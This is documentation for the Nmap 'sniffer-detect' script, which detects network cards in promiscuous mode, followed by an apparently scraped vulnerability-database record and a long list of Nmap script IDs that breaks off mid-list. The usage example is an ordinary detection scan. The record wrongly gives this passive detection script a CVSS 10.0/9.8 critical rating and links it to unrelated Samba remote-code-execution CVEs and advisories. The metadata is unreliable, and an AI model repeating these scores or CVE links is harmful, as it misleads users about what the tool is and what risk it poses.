Description
Checks if a target on a local Ethernet has its network card in promiscuous mode.
The techniques used are described at <http://www.securityfriday.com/promiscuous_detection_01.pdf>.
## Example Usage
nmap -sV --script=sniffer-detect <target>
## Script Output
Host script results:
|_ sniffer-detect: Likely in promiscuous mode (tests: "11111111")
## Requires
* [nmap](<../lib/nmap.html>)
* [stdnse](<../lib/stdnse.html>)
* string (Lua standard library)
* table (Lua standard library)
* * *
{"id": "NMAP:SNIFFER-DETECT.NSE", "vendorId": null, "type": "nmap", "bulletinFamily": "scanner", "title": "sniffer-detect NSE Script", "description": "Checks if a target on a local Ethernet has its network card in promiscuous mode. \n\nThe techniques used are described at <http://www.securityfriday.com/promiscuous_detection_01.pdf>.\n\n## Example Usage \n \n \n nmap -sV --script=sniffer-detect <target>\n\n## Script Output \n \n \n Host script results:\n |_ sniffer-detect: Likely in promiscuous mode (tests: \"11111111\")\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "published": "2008-11-06T02:52:59", "modified": "2015-11-05T20:41:05", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://nmap.org/nsedoc/scripts/sniffer-detect.html", "reporter": "Marek Majkowski", "references": [], "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "immutableFields": [], "lastseen": "2022-02-15T09:34:39", "viewCount": 278, "enchantments": {"score": {"value": 6.4, "vector": "NONE"}, 
"dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2017-834"]}, {"type": "archlinux", "idList": ["ASA-201705-22"]}, {"type": "attackerkb", "idList": ["AKB:49AAF9A1-B710-4CA1-AAFA-3C022294A5D4"]}, {"type": "avleonov", "idList": ["AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627"]}, {"type": "canvas", "idList": ["CVE_2012_1182", "CVE_2012_1182_NONX", "SAMBA_IS_KNOWN_PIPENAME"]}, {"type": "centos", "idList": ["CESA-2012:0465", "CESA-2012:0466", "CESA-2013:0506", "CESA-2013:0515", "CESA-2017:1270", "CESA-2017:1271"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-317", "CPAI-2013-2506", "CPAI-2017-0444"]}, {"type": "cisa", "idList": ["CISA:384A71FB1AD858FAC86EEB1A7660E778", "CISA:C73BC9C5DAF991808EA4A267072DA584"]}, {"type": "cisco", "idList": ["CISCO-SA-20170530-SAMBA"]}, {"type": "cve", "idList": ["CVE-2012-1182", "CVE-2017-7494"]}, {"type": "debian", "idList": ["DEBIAN:BSA-070:68853", "DEBIAN:DLA-951-1:1BAA2", "DEBIAN:DLA-951-1:51380", "DEBIAN:DSA-2450-1:77F45", "DEBIAN:DSA-3860-1:8B793", "DEBIAN:DSA-3860-1:E96B1"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2012-1182", "DEBIANCVE:CVE-2017-7494"]}, {"type": "exploitdb", "idList": ["EDB-ID:42060", "EDB-ID:42084"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:11BDEE18B40708887778CCF837705185"]}, {"type": "f5", "idList": ["F5:K13551136", "F5:K13719", "SOL13719"]}, {"type": "fedora", "idList": ["FEDORA:02833211E6", "FEDORA:095C220955", "FEDORA:0B8006061CC2", "FEDORA:219F3605E539", "FEDORA:30FE721464", "FEDORA:4B045219BA", "FEDORA:77AFB20FC7", "FEDORA:77E132110D", "FEDORA:79D7720B02", "FEDORA:7D08020F24", "FEDORA:BC7B0601FC16", "FEDORA:D3501201B6"]}, {"type": "freebsd", "idList": ["6F4D96C0-4062-11E7-B291-B499BAEBFEAF", "BAF37CD2-8351-11E1-894E-00215C6A37BB"]}, {"type": "gentoo", "idList": ["GLSA-201206-22", "GLSA-201805-07"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170613-01-SAMBA", "HUAWEI-SA-20171129-01-SAMBA"]}, {"type": "ibm", "idList": 
["82248DC9C1F555BF98367B4387954D2C23BFE20908CE565E0127C6A3FC16193E", "85D41384B88C530DBAB70791D41DFCF1CF314D456CBDB72E9AFA9ACC54A10939", "CE6756539D503C94C0FE819367133FAF5CF98E845923A4230C5E49923B068701"]}, {"type": "ics", "idList": ["ICSA-17-180-02"]}, {"type": "kitploit", "idList": ["KITPLOIT:4101563004973700412", "KITPLOIT:5052987141331551837"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME/", "MSF:EXPLOIT/LINUX/SAMBA/SETINFOPOLICY_HEAP"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786440", "MYHACK58:62201786477", "MYHACK58:62201786521", "MYHACK58:62201786995"]}, {"type": "nessus", "idList": ["6443.PRM", "700127.PRM", "ALA_ALAS-2017-834.NASL", "CENTOS_RHSA-2012-0465.NASL", "CENTOS_RHSA-2012-0466.NASL", "CENTOS_RHSA-2013-0506.NASL", "CENTOS_RHSA-2013-0515.NASL", "CENTOS_RHSA-2017-1270.NASL", "CENTOS_RHSA-2017-1271.NASL", "DEBIAN_DLA-951.NASL", "DEBIAN_DSA-2450.NASL", "DEBIAN_DSA-3860.NASL", "EULEROS_SA-2017-1104.NASL", "EULEROS_SA-2017-1105.NASL", "FEDORA_2012-5793.NASL", "FEDORA_2012-5805.NASL", "FEDORA_2012-5843.NASL", "FEDORA_2012-6349.NASL", "FEDORA_2012-6382.NASL", "FEDORA_2017-570C0071C4.NASL", "FEDORA_2017-642A0ECA75.NASL", "FEDORA_2017-C729C6123C.NASL", "FREEBSD_PKG_6F4D96C0406211E7B291B499BAEBFEAF.NASL", "FREEBSD_PKG_BAF37CD2835111E1894E00215C6A37BB.NASL", "GENTOO_GLSA-201206-22.NASL", "GENTOO_GLSA-201805-07.NASL", "JUNIPER_SPACE_JSA_10826.NASL", "MACOSX_SECUPD2012-002.NASL", "MANDRIVA_MDVSA-2012-055.NASL", "NEWSTART_CGSL_NS-SA-2019-0096_SAMBA.NASL", "NEWSTART_CGSL_NS-SA-2019-0100_SAMBA4.NASL", "OPENSUSE-2012-223.NASL", "OPENSUSE-2012-224.NASL", "OPENSUSE-2017-613.NASL", "OPENSUSE-2017-618.NASL", "ORACLELINUX_ELSA-2012-0465.NASL", "ORACLELINUX_ELSA-2012-0466.NASL", "ORACLELINUX_ELSA-2012-0478.NASL", "ORACLELINUX_ELSA-2013-0506.NASL", "ORACLELINUX_ELSA-2013-0515.NASL", "ORACLELINUX_ELSA-2017-1270.NASL", "ORACLELINUX_ELSA-2017-1271.NASL", "ORACLELINUX_ELSA-2017-1272.NASL", 
"REDHAT-RHSA-2012-0465.NASL", "REDHAT-RHSA-2012-0466.NASL", "REDHAT-RHSA-2013-0506.NASL", "REDHAT-RHSA-2013-0515.NASL", "REDHAT-RHSA-2017-1270.NASL", "REDHAT-RHSA-2017-1271.NASL", "REDHAT-RHSA-2017-1272.NASL", "REDHAT-RHSA-2017-1273.NASL", "REDHAT-RHSA-2017-1390.NASL", "SAMBA_4_6_4.NASL", "SAMBA_RPC_MULTIPLE_BUFFER_OVERFLOWS.NASL", "SLACKWARE_SSA_2017-144-01.NASL", "SL_20120410_SAMBA3X_ON_SL5_X.NASL", "SL_20120410_SAMBA_ON_SL5_X.NASL", "SL_20130221_OPENCHANGE_ON_SL6_X.NASL", "SL_20130221_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA4_ON_SL6_X.NASL", "SL_20170524_SAMBA_ON_SL6_X.NASL", "SOLARIS11_SAMBA_20121016.NASL", "SUSE_11_CIFS-MOUNT-120411.NASL", "SUSE_11_LDAPSMB-120415.NASL", "SUSE_CIFS-MOUNT-8058.NASL", "SUSE_SU-2017-1391-1.NASL", "SUSE_SU-2017-1392-1.NASL", "SUSE_SU-2017-1393-1.NASL", "SUSE_SU-2017-1396-1.NASL", "UBUNTU_USN-1423-1.NASL", "UBUNTU_USN-3296-1.NASL", "UBUNTU_USN-3296-2.NASL", "VIRTUOZZO_VZLSA-2017-1270.NASL", "VIRTUOZZO_VZLSA-2017-1271.NASL"]}, {"type": "nmap", "idList": ["NMAP:ACARSD-INFO.NSE", "NMAP:ADDRESS-INFO.NSE", "NMAP:AFP-BRUTE.NSE", "NMAP:AFP-LS.NSE", "NMAP:AFP-PATH-VULN.NSE", "NMAP:AFP-SERVERINFO.NSE", "NMAP:AFP-SHOWMOUNT.NSE", "NMAP:AJP-AUTH.NSE", "NMAP:AJP-BRUTE.NSE", "NMAP:AJP-HEADERS.NSE", "NMAP:AJP-METHODS.NSE", "NMAP:AJP-REQUEST.NSE", "NMAP:ALLSEEINGEYE-INFO.NSE", "NMAP:AMQP-INFO.NSE", "NMAP:ASN-QUERY.NSE", "NMAP:AUTH-OWNERS.NSE", "NMAP:AUTH-SPOOF.NSE", "NMAP:BACKORIFICE-BRUTE.NSE", "NMAP:BACKORIFICE-INFO.NSE", "NMAP:BACNET-INFO.NSE", "NMAP:BANNER.NSE", "NMAP:BITCOIN-GETADDR.NSE", "NMAP:BITCOIN-INFO.NSE", "NMAP:BITCOINRPC-INFO.NSE", "NMAP:BITTORRENT-DISCOVERY.NSE", "NMAP:BJNP-DISCOVER.NSE", "NMAP:BROADCAST-ATAOE-DISCOVER.NSE", "NMAP:BROADCAST-AVAHI-DOS.NSE", "NMAP:BROADCAST-BJNP-DISCOVER.NSE", "NMAP:BROADCAST-DB2-DISCOVER.NSE", "NMAP:BROADCAST-DHCP-DISCOVER.NSE", "NMAP:BROADCAST-DHCP6-DISCOVER.NSE", "NMAP:BROADCAST-DNS-SERVICE-DISCOVERY.NSE", "NMAP:BROADCAST-DROPBOX-LISTENER.NSE", "NMAP:BROADCAST-EIGRP-DISCOVERY.NSE", 
"NMAP:BROADCAST-HID-DISCOVERYD.NSE", "NMAP:BROADCAST-IGMP-DISCOVERY.NSE", "NMAP:BROADCAST-JENKINS-DISCOVER.NSE", "NMAP:BROADCAST-LISTENER.NSE", "NMAP:BROADCAST-MS-SQL-DISCOVER.NSE", "NMAP:BROADCAST-NETBIOS-MASTER-BROWSER.NSE", "NMAP:BROADCAST-NETWORKER-DISCOVER.NSE", "NMAP:BROADCAST-NOVELL-LOCATE.NSE", "NMAP:BROADCAST-OSPF2-DISCOVER.NSE", "NMAP:BROADCAST-PC-ANYWHERE.NSE", "NMAP:BROADCAST-PC-DUO.NSE", "NMAP:BROADCAST-PIM-DISCOVERY.NSE", "NMAP:BROADCAST-PING.NSE", "NMAP:BROADCAST-PPPOE-DISCOVER.NSE", "NMAP:BROADCAST-RIP-DISCOVER.NSE", "NMAP:BROADCAST-RIPNG-DISCOVER.NSE", "NMAP:BROADCAST-SONICWALL-DISCOVER.NSE", "NMAP:BROADCAST-SYBASE-ASA-DISCOVER.NSE", "NMAP:BROADCAST-TELLSTICK-DISCOVER.NSE", "NMAP:BROADCAST-UPNP-INFO.NSE", "NMAP:BROADCAST-VERSANT-LOCATE.NSE", "NMAP:BROADCAST-WAKE-ON-LAN.NSE", "NMAP:BROADCAST-WPAD-DISCOVER.NSE", "NMAP:BROADCAST-WSDD-DISCOVER.NSE", "NMAP:BROADCAST-XDMCP-DISCOVER.NSE", "NMAP:CASSANDRA-BRUTE.NSE", "NMAP:CASSANDRA-INFO.NSE", "NMAP:CCCAM-VERSION.NSE", "NMAP:CICS-ENUM.NSE", "NMAP:CICS-INFO.NSE", "NMAP:CICS-USER-BRUTE.NSE", "NMAP:CICS-USER-ENUM.NSE", "NMAP:CITRIX-BRUTE-XML.NSE", "NMAP:CITRIX-ENUM-APPS-XML.NSE", "NMAP:CITRIX-ENUM-APPS.NSE", "NMAP:CITRIX-ENUM-SERVERS-XML.NSE", "NMAP:CITRIX-ENUM-SERVERS.NSE", "NMAP:CLAMAV-EXEC.NSE", "NMAP:CLOCK-SKEW.NSE", "NMAP:COAP-RESOURCES.NSE", "NMAP:COUCHDB-DATABASES.NSE", "NMAP:COUCHDB-STATS.NSE", "NMAP:CREDS-SUMMARY.NSE", "NMAP:CUPS-INFO.NSE", "NMAP:CUPS-QUEUE-INFO.NSE", "NMAP:CVS-BRUTE-REPOSITORY.NSE", "NMAP:CVS-BRUTE.NSE", "NMAP:DAAP-GET-LIBRARY.NSE", "NMAP:DAYTIME.NSE", "NMAP:DB2-DAS-INFO.NSE", "NMAP:DELUGE-RPC-BRUTE.NSE", "NMAP:DHCP-DISCOVER.NSE", "NMAP:DICOM-BRUTE.NSE", "NMAP:DICOM-PING.NSE", "NMAP:DICT-INFO.NSE", "NMAP:DISTCC-CVE2004-2687.NSE", "NMAP:DNS-BLACKLIST.NSE", "NMAP:DNS-BRUTE.NSE", "NMAP:DNS-CACHE-SNOOP.NSE", "NMAP:DNS-CHECK-ZONE.NSE", "NMAP:DNS-CLIENT-SUBNET-SCAN.NSE", "NMAP:DNS-FUZZ.NSE", "NMAP:DNS-IP6-ARPA-SCAN.NSE", "NMAP:DNS-NSEC-ENUM.NSE", "NMAP:DNS-NSEC3-ENUM.NSE", 
"NMAP:DNS-NSID.NSE", "NMAP:DNS-RANDOM-SRCPORT.NSE", "NMAP:DNS-RANDOM-TXID.NSE", "NMAP:DNS-RECURSION.NSE", "NMAP:DNS-SERVICE-DISCOVERY.NSE", "NMAP:DNS-SRV-ENUM.NSE", "NMAP:DNS-UPDATE.NSE", "NMAP:DNS-ZEUSTRACKER.NSE", "NMAP:DNS-ZONE-TRANSFER.NSE", "NMAP:DOCKER-VERSION.NSE", "NMAP:DOMCON-BRUTE.NSE", "NMAP:DOMCON-CMD.NSE", "NMAP:DOMINO-ENUM-USERS.NSE", "NMAP:DPAP-BRUTE.NSE", "NMAP:DRDA-BRUTE.NSE", "NMAP:DRDA-INFO.NSE", "NMAP:DUPLICATES.NSE", "NMAP:EAP-INFO.NSE", "NMAP:ENIP-INFO.NSE", "NMAP:EPMD-INFO.NSE", "NMAP:EPPC-ENUM-PROCESSES.NSE", "NMAP:FCRDNS.NSE", "NMAP:FINGER.NSE", "NMAP:FINGERPRINT-STRINGS.NSE", "NMAP:FIREWALK.NSE", "NMAP:FIREWALL-BYPASS.NSE", "NMAP:FLUME-MASTER-INFO.NSE", "NMAP:FOX-INFO.NSE", "NMAP:FREELANCER-INFO.NSE", "NMAP:FTP-ANON.NSE", "NMAP:FTP-BOUNCE.NSE", "NMAP:FTP-BRUTE.NSE", "NMAP:FTP-LIBOPIE.NSE", "NMAP:FTP-PROFTPD-BACKDOOR.NSE", "NMAP:FTP-SYST.NSE", "NMAP:FTP-VSFTPD-BACKDOOR.NSE", "NMAP:FTP-VULN-CVE2010-4221.NSE", "NMAP:GANGLIA-INFO.NSE", "NMAP:GIOP-INFO.NSE", "NMAP:GKRELLM-INFO.NSE", "NMAP:GOPHER-LS.NSE", "NMAP:GPSD-INFO.NSE", "NMAP:HADOOP-DATANODE-INFO.NSE", "NMAP:HADOOP-JOBTRACKER-INFO.NSE", "NMAP:HADOOP-NAMENODE-INFO.NSE", "NMAP:HADOOP-SECONDARY-NAMENODE-INFO.NSE", "NMAP:HADOOP-TASKTRACKER-INFO.NSE", "NMAP:HBASE-MASTER-INFO.NSE", "NMAP:HBASE-REGION-INFO.NSE", "NMAP:HDDTEMP-INFO.NSE", "NMAP:HNAP-INFO.NSE", "NMAP:HOSTMAP-BFK.NSE", "NMAP:HOSTMAP-CRTSH.NSE", "NMAP:HOSTMAP-ROBTEX.NSE", "NMAP:HTTP-ADOBE-COLDFUSION-APSA1301.NSE", "NMAP:HTTP-AFFILIATE-ID.NSE", "NMAP:HTTP-APACHE-NEGOTIATION.NSE", "NMAP:HTTP-APACHE-SERVER-STATUS.NSE", "NMAP:HTTP-ASPNET-DEBUG.NSE", "NMAP:HTTP-AUTH-FINDER.NSE", "NMAP:HTTP-AUTH.NSE", "NMAP:HTTP-AVAYA-IPOFFICE-USERS.NSE", "NMAP:HTTP-AWSTATSTOTALS-EXEC.NSE", "NMAP:HTTP-AXIS2-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BACKUP-FINDER.NSE", "NMAP:HTTP-BARRACUDA-DIR-TRAVERSAL.NSE", "NMAP:HTTP-BIGIP-COOKIE.NSE", "NMAP:HTTP-BRUTE.NSE", "NMAP:HTTP-CAKEPHP-VERSION.NSE", "NMAP:HTTP-CHRONO.NSE", "NMAP:HTTP-CISCO-ANYCONNECT.NSE", 
"NMAP:HTTP-COLDFUSION-SUBZERO.NSE", "NMAP:HTTP-COMMENTS-DISPLAYER.NSE", "NMAP:HTTP-CONFIG-BACKUP.NSE", "NMAP:HTTP-COOKIE-FLAGS.NSE", "NMAP:HTTP-CORS.NSE", "NMAP:HTTP-CROSS-DOMAIN-POLICY.NSE", "NMAP:HTTP-CSRF.NSE", "NMAP:HTTP-DATE.NSE", "NMAP:HTTP-DEFAULT-ACCOUNTS.NSE", "NMAP:HTTP-DEVFRAMEWORK.NSE", "NMAP:HTTP-DLINK-BACKDOOR.NSE", "NMAP:HTTP-DOMBASED-XSS.NSE", "NMAP:HTTP-DOMINO-ENUM-PASSWORDS.NSE", "NMAP:HTTP-DRUPAL-ENUM-USERS.NSE", "NMAP:HTTP-DRUPAL-ENUM.NSE", "NMAP:HTTP-ENUM.NSE", "NMAP:HTTP-ERRORS.NSE", "NMAP:HTTP-EXIF-SPIDER.NSE", "NMAP:HTTP-FAVICON.NSE", "NMAP:HTTP-FEED.NSE", "NMAP:HTTP-FETCH.NSE", "NMAP:HTTP-FILEUPLOAD-EXPLOITER.NSE", "NMAP:HTTP-FORM-BRUTE.NSE", "NMAP:HTTP-FORM-FUZZER.NSE", "NMAP:HTTP-FRONTPAGE-LOGIN.NSE", "NMAP:HTTP-GENERATOR.NSE", "NMAP:HTTP-GIT.NSE", "NMAP:HTTP-GITWEB-PROJECTS-ENUM.NSE", "NMAP:HTTP-GOOGLE-MALWARE.NSE", "NMAP:HTTP-GREP.NSE", "NMAP:HTTP-HEADERS.NSE", "NMAP:HTTP-HP-ILO-INFO.NSE", "NMAP:HTTP-HUAWEI-HG5XX-VULN.NSE", "NMAP:HTTP-ICLOUD-FINDMYIPHONE.NSE", "NMAP:HTTP-ICLOUD-SENDMSG.NSE", "NMAP:HTTP-IIS-SHORT-NAME-BRUTE.NSE", "NMAP:HTTP-IIS-WEBDAV-VULN.NSE", "NMAP:HTTP-INTERNAL-IP-DISCLOSURE.NSE", "NMAP:HTTP-JOOMLA-BRUTE.NSE", "NMAP:HTTP-JSONP-DETECTION.NSE", "NMAP:HTTP-LITESPEED-SOURCECODE-DOWNLOAD.NSE", "NMAP:HTTP-LS.NSE", "NMAP:HTTP-MAJORDOMO2-DIR-TRAVERSAL.NSE", "NMAP:HTTP-MALWARE-HOST.NSE", "NMAP:HTTP-MCMP.NSE", "NMAP:HTTP-METHOD-TAMPER.NSE", "NMAP:HTTP-METHODS.NSE", "NMAP:HTTP-MOBILEVERSION-CHECKER.NSE", "NMAP:HTTP-NTLM-INFO.NSE", "NMAP:HTTP-OPEN-PROXY.NSE", "NMAP:HTTP-OPEN-REDIRECT.NSE", "NMAP:HTTP-PASSWD.NSE", "NMAP:HTTP-PHP-VERSION.NSE", "NMAP:HTTP-PHPMYADMIN-DIR-TRAVERSAL.NSE", "NMAP:HTTP-PHPSELF-XSS.NSE", "NMAP:HTTP-PROXY-BRUTE.NSE", "NMAP:HTTP-PUT.NSE", "NMAP:HTTP-QNAP-NAS-INFO.NSE", "NMAP:HTTP-REFERER-CHECKER.NSE", "NMAP:HTTP-RFI-SPIDER.NSE", "NMAP:HTTP-ROBTEX-REVERSE-IP.NSE", "NMAP:HTTP-ROBTEX-SHARED-NS.NSE", "NMAP:HTTP-SAP-NETWEAVER-LEAK.NSE", "NMAP:HTTP-SECURITY-HEADERS.NSE", "NMAP:HTTP-SERVER-HEADER.NSE", 
"NMAP:HTTP-SHELLSHOCK.NSE", "NMAP:HTTP-SITEMAP-GENERATOR.NSE", "NMAP:HTTP-SLOWLORIS-CHECK.NSE", "NMAP:HTTP-SLOWLORIS.NSE", "NMAP:HTTP-SQL-INJECTION.NSE", "NMAP:HTTP-STORED-XSS.NSE", "NMAP:HTTP-SVN-ENUM.NSE", "NMAP:HTTP-SVN-INFO.NSE", "NMAP:HTTP-TITLE.NSE", "NMAP:HTTP-TPLINK-DIR-TRAVERSAL.NSE", "NMAP:HTTP-TRACE.NSE", "NMAP:HTTP-TRACEROUTE.NSE", "NMAP:HTTP-TRANE-INFO.NSE", "NMAP:HTTP-UNSAFE-OUTPUT-ESCAPING.NSE", "NMAP:HTTP-USERAGENT-TESTER.NSE", "NMAP:HTTP-USERDIR-ENUM.NSE", "NMAP:HTTP-VHOSTS.NSE", "NMAP:HTTP-VIRUSTOTAL.NSE", "NMAP:HTTP-VLCSTREAMER-LS.NSE", "NMAP:HTTP-VMWARE-PATH-VULN.NSE", "NMAP:HTTP-VULN-CVE2006-3392.NSE", "NMAP:HTTP-VULN-CVE2009-3960.NSE", "NMAP:HTTP-VULN-CVE2010-0738.NSE", "NMAP:HTTP-VULN-CVE2010-2861.NSE", "NMAP:HTTP-VULN-CVE2011-3192.NSE", "NMAP:HTTP-VULN-CVE2011-3368.NSE", "NMAP:HTTP-VULN-CVE2012-1823.NSE", "NMAP:HTTP-VULN-CVE2013-0156.NSE", "NMAP:HTTP-VULN-CVE2013-6786.NSE", "NMAP:HTTP-VULN-CVE2013-7091.NSE", "NMAP:HTTP-VULN-CVE2014-2126.NSE", "NMAP:HTTP-VULN-CVE2014-2127.NSE", "NMAP:HTTP-VULN-CVE2014-2128.NSE", "NMAP:HTTP-VULN-CVE2014-2129.NSE", "NMAP:HTTP-VULN-CVE2014-3704.NSE", "NMAP:HTTP-VULN-CVE2014-8877.NSE", "NMAP:HTTP-VULN-CVE2015-1427.NSE", "NMAP:HTTP-VULN-CVE2015-1635.NSE", "NMAP:HTTP-VULN-CVE2017-1001000.NSE", "NMAP:HTTP-VULN-CVE2017-5638.NSE", "NMAP:HTTP-VULN-CVE2017-5689.NSE", "NMAP:HTTP-VULN-CVE2017-8917.NSE", "NMAP:HTTP-VULN-MISFORTUNE-COOKIE.NSE", "NMAP:HTTP-VULN-WNR1000-CREDS.NSE", "NMAP:HTTP-WAF-DETECT.NSE", "NMAP:HTTP-WAF-FINGERPRINT.NSE", "NMAP:HTTP-WEBDAV-SCAN.NSE", "NMAP:HTTP-WORDPRESS-BRUTE.NSE", "NMAP:HTTP-WORDPRESS-ENUM.NSE", "NMAP:HTTP-WORDPRESS-USERS.NSE", "NMAP:HTTP-XSSED.NSE", "NMAP:HTTPS-REDIRECT.NSE", "NMAP:IAX2-BRUTE.NSE", "NMAP:IAX2-VERSION.NSE", "NMAP:ICAP-INFO.NSE", "NMAP:IEC-IDENTIFY.NSE", "NMAP:IKE-VERSION.NSE", "NMAP:IMAP-BRUTE.NSE", "NMAP:IMAP-CAPABILITIES.NSE", "NMAP:IMAP-NTLM-INFO.NSE", "NMAP:IMPRESS-REMOTE-DISCOVER.NSE", "NMAP:INFORMIX-BRUTE.NSE", "NMAP:INFORMIX-QUERY.NSE", "NMAP:INFORMIX-TABLES.NSE", 
"NMAP:IP-FORWARDING.NSE", "NMAP:IP-GEOLOCATION-GEOPLUGIN.NSE", "NMAP:IP-GEOLOCATION-IPINFODB.NSE", "NMAP:IP-GEOLOCATION-MAP-BING.NSE", "NMAP:IP-GEOLOCATION-MAP-GOOGLE.NSE", "NMAP:IP-GEOLOCATION-MAP-KML.NSE", "NMAP:IP-GEOLOCATION-MAXMIND.NSE", "NMAP:IP-HTTPS-DISCOVER.NSE", "NMAP:IPIDSEQ.NSE", "NMAP:IPMI-BRUTE.NSE", "NMAP:IPMI-CIPHER-ZERO.NSE", "NMAP:IPMI-VERSION.NSE", "NMAP:IPV6-MULTICAST-MLD-LIST.NSE", "NMAP:IPV6-NODE-INFO.NSE", "NMAP:IPV6-RA-FLOOD.NSE", "NMAP:IRC-BOTNET-CHANNELS.NSE", "NMAP:IRC-BRUTE.NSE", "NMAP:IRC-INFO.NSE", "NMAP:IRC-SASL-BRUTE.NSE", "NMAP:IRC-UNREALIRCD-BACKDOOR.NSE", "NMAP:ISCSI-BRUTE.NSE", "NMAP:ISCSI-INFO.NSE", "NMAP:ISNS-INFO.NSE", "NMAP:JDWP-EXEC.NSE", "NMAP:JDWP-INFO.NSE", "NMAP:JDWP-INJECT.NSE", "NMAP:JDWP-VERSION.NSE", "NMAP:KNX-GATEWAY-DISCOVER.NSE", "NMAP:KNX-GATEWAY-INFO.NSE", "NMAP:KRB5-ENUM-USERS.NSE", "NMAP:LDAP-BRUTE.NSE", "NMAP:LDAP-NOVELL-GETPASS.NSE", "NMAP:LDAP-ROOTDSE.NSE", "NMAP:LDAP-SEARCH.NSE", "NMAP:LEXMARK-CONFIG.NSE", "NMAP:LLMNR-RESOLVE.NSE", "NMAP:LLTD-DISCOVERY.NSE", "NMAP:LU-ENUM.NSE", "NMAP:MAXDB-INFO.NSE", "NMAP:MCAFEE-EPO-AGENT.NSE", "NMAP:MEMBASE-BRUTE.NSE", "NMAP:MEMBASE-HTTP-INFO.NSE", "NMAP:MEMCACHED-INFO.NSE", "NMAP:METASPLOIT-INFO.NSE", "NMAP:METASPLOIT-MSGRPC-BRUTE.NSE", "NMAP:METASPLOIT-XMLRPC-BRUTE.NSE", "NMAP:MIKROTIK-ROUTEROS-BRUTE.NSE", "NMAP:MMOUSE-BRUTE.NSE", "NMAP:MMOUSE-EXEC.NSE", "NMAP:MODBUS-DISCOVER.NSE", "NMAP:MONGODB-BRUTE.NSE", "NMAP:MONGODB-DATABASES.NSE", "NMAP:MONGODB-INFO.NSE", "NMAP:MQTT-SUBSCRIBE.NSE", "NMAP:MRINFO.NSE", "NMAP:MS-SQL-BRUTE.NSE", "NMAP:MS-SQL-CONFIG.NSE", "NMAP:MS-SQL-DAC.NSE", "NMAP:MS-SQL-DUMP-HASHES.NSE", "NMAP:MS-SQL-EMPTY-PASSWORD.NSE", "NMAP:MS-SQL-HASDBACCESS.NSE", "NMAP:MS-SQL-INFO.NSE", "NMAP:MS-SQL-NTLM-INFO.NSE", "NMAP:MS-SQL-QUERY.NSE", "NMAP:MS-SQL-TABLES.NSE", "NMAP:MS-SQL-XP-CMDSHELL.NSE", "NMAP:MSRPC-ENUM.NSE", "NMAP:MTRACE.NSE", "NMAP:MURMUR-VERSION.NSE", "NMAP:MYSQL-AUDIT.NSE", "NMAP:MYSQL-BRUTE.NSE", "NMAP:MYSQL-DATABASES.NSE", 
"NMAP:MYSQL-DUMP-HASHES.NSE", "NMAP:MYSQL-EMPTY-PASSWORD.NSE", "NMAP:MYSQL-ENUM.NSE", "NMAP:MYSQL-INFO.NSE", "NMAP:MYSQL-QUERY.NSE", "NMAP:MYSQL-USERS.NSE", "NMAP:MYSQL-VARIABLES.NSE", "NMAP:MYSQL-VULN-CVE2012-2122.NSE", "NMAP:NAT-PMP-INFO.NSE", "NMAP:NAT-PMP-MAPPORT.NSE", "NMAP:NBD-INFO.NSE", "NMAP:NBNS-INTERFACES.NSE", "NMAP:NBSTAT.NSE", "NMAP:NCP-ENUM-USERS.NSE", "NMAP:NCP-SERVERINFO.NSE", "NMAP:NDMP-FS-INFO.NSE", "NMAP:NDMP-VERSION.NSE", "NMAP:NESSUS-BRUTE.NSE", "NMAP:NESSUS-XMLRPC-BRUTE.NSE", "NMAP:NETBUS-AUTH-BYPASS.NSE", "NMAP:NETBUS-BRUTE.NSE", "NMAP:NETBUS-INFO.NSE", "NMAP:NETBUS-VERSION.NSE", "NMAP:NEXPOSE-BRUTE.NSE", "NMAP:NFS-LS.NSE", "NMAP:NFS-SHOWMOUNT.NSE", "NMAP:NFS-STATFS.NSE", "NMAP:NJE-NODE-BRUTE.NSE", "NMAP:NJE-PASS-BRUTE.NSE", "NMAP:NNTP-NTLM-INFO.NSE", "NMAP:NPING-BRUTE.NSE", "NMAP:NRPE-ENUM.NSE", "NMAP:NTP-INFO.NSE", "NMAP:NTP-MONLIST.NSE", "NMAP:OMP2-BRUTE.NSE", "NMAP:OMP2-ENUM-TARGETS.NSE", "NMAP:OMRON-INFO.NSE", "NMAP:OPENFLOW-INFO.NSE", "NMAP:OPENLOOKUP-INFO.NSE", "NMAP:OPENVAS-OTP-BRUTE.NSE", "NMAP:OPENWEBNET-DISCOVERY.NSE", "NMAP:ORACLE-BRUTE-STEALTH.NSE", "NMAP:ORACLE-BRUTE.NSE", "NMAP:ORACLE-ENUM-USERS.NSE", "NMAP:ORACLE-SID-BRUTE.NSE", "NMAP:ORACLE-TNS-VERSION.NSE", "NMAP:OVS-AGENT-VERSION.NSE", "NMAP:P2P-CONFICKER.NSE", "NMAP:PATH-MTU.NSE", 